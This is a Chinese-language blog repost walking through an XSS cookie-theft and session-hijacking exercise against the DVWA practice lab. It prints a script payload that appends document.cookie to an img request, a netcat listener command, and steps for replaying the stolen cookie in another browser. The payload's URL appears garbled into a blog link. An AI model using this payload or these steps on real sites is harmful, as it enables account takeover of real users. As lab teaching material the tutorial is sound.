主頁 >  其他 > XSS cookie偽造攻擊

XSS cookie偽造攻擊

2023-06-14 09:28:48 其他

環境

系統:windows 7

靶場:DVWA

場景:chrome對firefox的個人cookie盜用偽造

IP:192.168.98.128

埠:未占用的任意埠  [1024-49151]

實施

1.首先確保firefox登錄狀態,即存在cookie

2.構造獲取cookie的js請求腳本

<script>
    document.write(    
        '<img src="https://www.cnblogs.com/Wizo-WLsecTeam/archive/2023/06/13/url'+
         document.cookie+
        '"/>'    
    //利用img標簽特性,生成src的GET請求并獲取請求頁面cookie,然后作為圖片去展示;    
    );
//通過document.write寫到網頁中來-執行img標簽-去觸發指令-生成一個含cookie的GET請求
</script>
//因為src=https://www.cnblogs.com/Wizo-WLsecTeam/archive/2023/06/13/“”中引號內容只會作為資料字串進行展示,所以需引進script腳本去執行document.cookie,對標簽和執行內容進行‘單引號’分隔和【資料+指令+資料】的拼接

原理:構造一個訪問請求來盜取瀏覽器頁面的cookie

3.提交執行腳本

在任意輸入框進行提交,注意繞過前端輸入長度限制

4.進行nc埠監聽

nc  -lp  8011

 注:此處須保持與構造請求的埠一致!!

5.替換cookie實作偽造盜用

  • 1.打開chrome瀏覽器訪問DVWA
  • 2.找到頁面cookie資訊
  • 3.進行cookie值的替換

6.實作登錄

此處并不是直接重繪頁面,因為其登錄頁面是固定的,我們要通過cookie的盜用直接獲取其登錄狀態,因此此處訪問的應該是首頁

http://127.0.0.1:8082

 可以看到成功進入DVWA的頁面,攻擊完成,

TRANSLATE with x English
Arabic Hebrew Polish
Bulgarian Hindi Portuguese
Catalan Hmong Daw Romanian
Chinese Simplified Hungarian Russian
Chinese Traditional Indonesian Slovak
Czech Italian Slovenian
Danish Japanese Spanish
Dutch Klingon Swedish
English Korean Thai
Estonian Latvian Turkish
Finnish Lithuanian Ukrainian
French Malay Urdu
German Maltese Vietnamese
Greek Norwegian Welsh
Haitian Creole Persian  
  TRANSLATE with COPY THE URL BELOW Back EMBED THE SNIPPET BELOW IN YOUR SITE Enable collaborative features and customize widget: Bing Webmaster Portal Back ------------------------------------------- 天寒地凍,路遙馬亡,--------------------------------------------

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/555101.html

標籤:其他

上一篇:Junit執行器Runner探索之旅

下一篇:返回列表

標籤雲
其他(160934) Python(38226) JavaScript(25493) Java(18235) C(15237) 區塊鏈(8270) C#(7972) AI(7469) 爪哇(7425) MySQL(7248) html(6777) 基礎類(6313) sql(6102) 熊猫(6058) PHP(5875) 数组(5741) R(5409) Linux(5347) 反应(5209) 腳本語言(PerlPython)(5129) 非技術區(4971) Android(4591) 数据框(4311) css(4259) 节点.js(4032) C語言(3288) json(3245) 列表(3129) 扑(3119) C++語言(3117) 安卓(2998) 打字稿(2995) VBA(2789) Java相關(2746) 疑難問題(2699) 细绳(2522) 單片機工控(2479) iOS(2435) ASP.NET(2404) MongoDB(2323) 麻木的(2285) 正则表达式(2254) 字典(2211) 循环(2198) 迅速(2185) 擅长(2169) 镖(2155) .NET技术(1984) 功能(1967) HtmlCss(1964) Web開發(1951) C++(1939) python-3.x(1918) 弹簧靴(1913) xml(1889) PostgreSQL(1881) .NETCore(1863) 谷歌表格(1846) Unity3D(1843) for循环(1842)

熱門瀏覽
  • 網閘典型架構簡述

    網閘架構一般分為兩種:三主機的三系統架構網閘和雙主機的2+1架構網閘。 三主機架構分別為內端機、外端機和仲裁機。三機無論從軟體和硬體上均各自獨立。首先從硬體上來看,三機都用各自獨立的主板、記憶體及存盤設備。從軟體上來看,三機有各自獨立的作業系統。這樣能達到完全的三機獨立。對于“2+1”系統,“2”分為 ......

    uj5u.com 2020-09-10 02:00:44 more
  • 如何從xshell上傳檔案到centos linux虛擬機里

    如何從xshell上傳檔案到centos linux虛擬機里及:虛擬機CentOs下執行 yum -y install lrzsz命令,出現錯誤:鏡像無法找到軟體包 前言 一、安裝lrzsz步驟 二、上傳檔案 三、遇到的問題及解決方案 總結 前言 提示:其實很簡單,往虛擬機上安裝一個上傳檔案的工具 ......

    uj5u.com 2020-09-10 02:00:47 more
  • 一、SQLMAP入門

    一、SQLMAP入門 1、判斷是否存在注入 sqlmap.py -u 網址/id=1 id=1不可缺少。當注入點后面的引數大于兩個時。需要加雙引號, sqlmap.py -u "網址/id=1&uid=1" 2、判斷文本中的請求是否存在注入 從文本中加載http請求,SQLMAP可以從一個文本檔案中 ......

    uj5u.com 2020-09-10 02:00:50 more
  • Metasploit 簡單使用教程

    metasploit 簡單使用教程 浩先生, 2020-08-28 16:18:25 分類專欄: kail 網路安全 linux 文章標簽: linux資訊安全 編輯 著作權 metasploit 使用教程 前言 一、Metasploit是什么? 二、準備作業 三、具體步驟 前言 Msfconsole ......

    uj5u.com 2020-09-10 02:00:53 more
  • 游戲逆向之驅動層與用戶層通訊

    驅動層代碼: #pragma once #include <ntifs.h> #define add_code CTL_CODE(FILE_DEVICE_UNKNOWN,0x800,METHOD_BUFFERED,FILE_ANY_ACCESS) /* 更多游戲逆向視頻www.yxfzedu.com ......

    uj5u.com 2020-09-10 02:00:56 more
  • 北斗電力時鐘(北斗授時服務器)讓網路資料更精準

    北斗電力時鐘(北斗授時服務器)讓網路資料更精準 北斗電力時鐘(北斗授時服務器)讓網路資料更精準 京準電子科技官微——ahjzsz 近幾年,資訊技術的得了快速發展,互聯網在逐漸普及,其在人們生活和生產中都得到了廣泛應用,并且取得了不錯的應用效果。計算機網路資訊在電力系統中的應用,一方面使電力系統的運行 ......

    uj5u.com 2020-09-10 02:01:03 more
  • 【CTF】CTFHub 技能樹 彩蛋 writeup

    ?碎碎念 CTFHub:https://www.ctfhub.com/ 筆者入門CTF時時剛開始刷的是bugku的舊平臺,后來才有了CTFHub。 感覺不論是網頁UI設計,還是題目質量,賽事跟蹤,工具軟體都做得很不錯。 而且因為獨到的金幣制度的確讓人有一種想去刷題賺金幣的感覺。 個人還是非常喜歡這個 ......

    uj5u.com 2020-09-10 02:04:05 more
  • 02windows基礎操作

    我學到了一下幾點 Windows系統目錄結構與滲透的作用 常見Windows的服務詳解 Windows埠詳解 常用的Windows注冊表詳解 hacker DOS命令詳解(net user / type /md /rd/ dir /cd /net use copy、批處理 等) 利用dos命令制作 ......

    uj5u.com 2020-09-10 02:04:18 more
  • 03.Linux基礎操作

    我學到了以下幾點 01Linux系統介紹02系統安裝,密碼啊破解03Linux常用命令04LAMP 01LINUX windows: win03 8 12 16 19 配置不繁瑣 Linux:redhat,centos(紅帽社區版),Ubuntu server,suse unix:金融機構,證券,銀 ......

    uj5u.com 2020-09-10 02:04:30 more
  • 05HTML

    01HTML介紹 02頭部標簽講解03基礎標簽講解04表單標簽講解 HTML前段語言 js1.了解代碼2.根據代碼 懂得挖掘漏洞 (POST注入/XSS漏洞上傳)3.黑帽seo 白帽seo 客戶網站被黑帽植入劫持代碼如何處理4.熟悉html表單 <html><head><title>TDK標題,描述 ......

    uj5u.com 2020-09-10 02:04:36 more
最新发布
  • XSS cookie偽造攻擊

    環境 系統:windows 7 靶場:DVWA 場景:chrome對firefox的個人cookie盜用偽造 IP:192.168.98.128 埠:未占用的任意埠 [1024-49151] 實施 1.首先確保firefox登錄狀態,即存在cookie 2.構造獲取cookie的js請求腳本 < ......

    uj5u.com 2023-06-14 09:28:48 more
  • Junit執行器Runner探索之旅

    單元測驗是每個程式員必備的技能,而Runner是每個單元測驗類必有屬性。本文通過解讀Junit原始碼,介紹junit中每個執行器的使用方法,讓讀者在單元測驗時,可以靈活的使用Runner執行器。 ......

    uj5u.com 2023-06-14 09:28:39 more
  • 業務程式員不建議造輪子

    不要問我是.net程式員還是java程式員,我是業務程式員。 作業多年,我覺得業務程式員,不應該造輪子。 多年以前,我就吃過造輪子的虧,有時,我作業大概60%的時間在造輪子、改輪子的BUG,40%的時間在寫業務功能。 為什么要造輪子呢,為了學技術,為了不認輸。但是造輪子的代價很大,也影響作業,寫著業 ......

    uj5u.com 2023-06-14 09:28:35 more
  • 全堆疊工程師必備技能與工具大全

    全堆疊工程師是在前端和后端 Web 開發方面具有專業知識的專業人士。他們對各種編程語言、框架和工具有深入的了解。從無到有創建 Web 應用程式,包括設計、開發、測驗和維護。據Glassdoor的調研資料顯示,在美國,全堆疊工程師的平均年薪為114,000美金,作為能夠負責Web應用程式的前端和后端的團隊 ......

    uj5u.com 2023-06-14 09:28:31 more
  • 五年磨一劍——Sealos 云作業系統正式發布!

    ## 這是個宏偉的計劃 這是一個宏偉的計劃,漫長且有趣。 2018 年的某個夜晚,夜深人靜,我揮舞鍵盤,敲下了 Sealos 的第一行代碼。當時倉庫命名為 “kubeinit”,后來覺得格局太小,我不可能只做一個安裝 Kubernetes 的工具。安裝只是更大計劃的一部分,于是更名為 [Sealos ......

    uj5u.com 2023-06-14 09:23:05 more
  • 【解決方法】銳捷EVE模擬器中VPC無法通過DHCP獲取IP地址,改用介面

    # 環境: >工具:銳捷EVE模擬器,VMware Workstation Pro 遠程工具:SecureCRT 系統版本:Windows 10 # 問題描述: >描述:一個簡單的DHCP環境,使用VPC充當PC客戶機,IP地址獲取為DHCP方式。但在發送request資料包后,服務器服務器已經把地 ......

    uj5u.com 2023-06-14 09:19:01 more
  • 架構師日記-從技術角度揭露電商大促備戰的奧秘

    今年的618大促已經如期而至,接下來我會從技術的角度,跟大家聊聊大促備戰的底層邏輯和實戰方案,希望能夠解答大家心中的一些疑惑。 ......

    uj5u.com 2023-06-14 09:18:45 more
  • 自然語言處理 Paddle NLP - 預訓練語言模型及應用

    ### 什么是語言理解? 關于疫情的一段對話: - 中國:我們這邊快完了 - 歐洲:我們這邊快完了 - 中國:我們好多了 - 歐洲:我們好多了 挑戰: - 語言的復雜性和多樣性 1. 多義/同義/歧義現象 2. 靈活多變的表達形式 - 語言背后的環境知識 1. 以前沒錢買華為,現在沒錢買華為 語言理 ......

    uj5u.com 2023-06-14 09:17:22 more
  • ChatGPT在工業領域的研究與應用探索-AI助手實驗應用

    對于工業來講,一是沒有基礎資料,二是無法立刻解決老問題。這種情況下,ChatGPT如何與工業相結合呢!我就是ChatGPT、ChatGPT就是我,達到我即是佛,佛即是我的境界。我把日常作業記錄輸入給ChatGPT,把它培養成我的工業AI助手,是不是將來它會變得和我一樣強大。至少,我認為這是發展程序中... ......

    uj5u.com 2023-06-14 09:16:02 more
  • 全堆疊工程師必備技能與工具大全

    全堆疊工程師是在前端和后端 Web 開發方面具有專業知識的專業人士。他們對各種編程語言、框架和工具有深入的了解。從無到有創建 Web 應用程式,包括設計、開發、測驗和維護。據Glassdoor的調研資料顯示,在美國,全堆疊工程師的平均年薪為114,000美金,作為能夠負責Web應用程式的前端和后端的團隊 ......

    uj5u.com 2023-06-14 09:15:48 more